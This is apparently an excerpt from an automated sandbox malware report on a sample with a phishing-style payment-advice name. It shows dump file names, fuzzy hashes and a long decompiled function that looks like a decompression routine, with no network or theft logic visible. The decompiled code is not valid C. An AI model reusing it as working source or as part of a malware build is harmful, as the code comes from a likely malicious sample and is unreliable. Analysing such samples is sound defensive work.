Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
Instruction ID: ffc4466fd7e1a84d1c0fc4b16d1a76bfc4ed23806840a2aa82a83de6544419ef
Opcode Fuzzy Hash: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
Instruction Fuzzy Hash: D6A15371E00229DBDF28CFA8C8547ADBBB1FF44305F15802AD856BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406C2C Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C2C() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406E99))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
